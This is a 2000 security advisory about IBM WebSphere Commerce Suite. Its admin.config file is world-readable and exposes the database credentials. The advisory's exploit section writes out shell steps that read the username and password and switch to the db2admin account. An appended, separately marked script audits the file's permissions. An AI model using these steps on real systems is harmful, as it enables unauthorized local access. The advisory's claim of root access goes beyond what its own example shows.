[ SOURCE: http://www.secureroot.com/security/advisories/9786040491.html ]

CHINANSL Security Advisory(CSA200013)

Topic: IBM WCS local user exceed his authority to access another file

Release Date: Dec 25, 2000

Affected system:
============
IBM WCS(Websphere Commerce Suite)
    + Sun OS
    + Sun Solaris
    + Microsoft Windows NT
    + Microsoft Windows 2000
    + HP HP-UX
    + IBM AIX
    + Linux

Impact:
======
The CHINANSL security team has found a security problem in IBM WCS. By exploiting this vulnerability, a malicious local user may be able to run arbitrary commands and gain root rights.

Description:
=========
IBM WCS is a business suite. After it is installed, a file named admin.config is produced. This file includes the user name and password that the suite uses to connect to its database. The file's access rights are -rwxr-xr-x, so any local user can read it and then run arbitrary commands to gain root rights.

Exploit:
=====
Examples for Sun OS 5.7

$find admin.config |grep admin.config
/opt/WebSphere/AppServer/bin/admin.config
$cd /opt/WebSphere/AppServer/bin/
$grep dbUser admin.config
com.ibm.ejs.sm.adminServer.dbUser=db2admin
$grep dbPassword admin.config
com.ibm.ejs.sm.adminServer.dbPassword=ibmdb2
$su - db2admin
password:ibmdb2
$id
uid=db2adminID(db2admin)

Examples for WIN2000:

d:\waserver\bin\>more admin.config
com.ibm.ejs.sm.adminServer.dbUser=ad2admin
com.ibm.ejs.sm.adminServer.dbPassword=ad2admin
...

Workaround:
=========
1. Configure this product correctly.

Solution:
=======
None

DISCLAIMS:
========
THE INFORMATION PROVIDED IS RELEASED BY CHINANSL "AS IS" WITHOUT WARRANTY OF ANY KIND. CHINANSL DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL CHINANSL BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF CHINANSL HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use.

CHINANSL Security Team
CHINANSL INFORMATION TECHNOLOGY CO.,LTD
(http://www.chinansl.com)
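
The workaround above does not say what a correct configuration looks like. As an added example (not part of the CHINANSL advisory and not an IBM tool), the following shell function audits an admin.config for the condition the advisory describes: database credential properties stored in a file that group or other users can read or write. The function name check_admin_config and the suggested mode 600 are assumptions; the property names and the example path come from the advisory.

```shell
#!/bin/sh
# Added example: audit a WebSphere admin.config for the exposure described
# in the advisory (database credentials in a file other local users can read).
# check_admin_config is a hypothetical helper name, not an IBM tool.
#
# Usage (path taken from the advisory's Sun OS example):
#   check_admin_config /opt/WebSphere/AppServer/bin/admin.config
#
# Returns 0 if the file is not exposed, 1 if exposed, 2 if it is missing.
check_admin_config() {
    cfg=$1
    [ -f "$cfg" ] || { echo "missing: $cfg" >&2; return 2; }

    # Only files holding the credential properties named in the advisory matter.
    if ! grep -Eq '^com\.ibm\.ejs\.sm\.adminServer\.db(User|Password)=' "$cfg"; then
        echo "ok: no database credentials found in $cfg"
        return 0
    fi

    # Mode string from ls -l, e.g. -rwxr-xr-x.
    # Characters 5-7 are the group bits, 8-10 the bits for everyone else.
    mode=$(ls -ld "$cfg" | cut -c1-10)
    others=$(printf '%s' "$mode" | cut -c5-10)

    case $others in
        # No read or write bit for group or other: credentials stay private.
        --?--?)
            echo "ok: $cfg is $mode"
            return 0 ;;
        *)
            echo "EXPOSED: $cfg is $mode and contains database credentials"
            # Assumed remediation: owner-only access, then rotate the password,
            # since it may already have been read by other local users.
            echo "suggested fix: chmod 600 \"$cfg\" and change the database password"
            return 1 ;;
    esac
}
```

The mode 600 assumes the administrative server runs as the file's owner; if it runs under a different account, give that account's group read access instead of leaving the file world-readable.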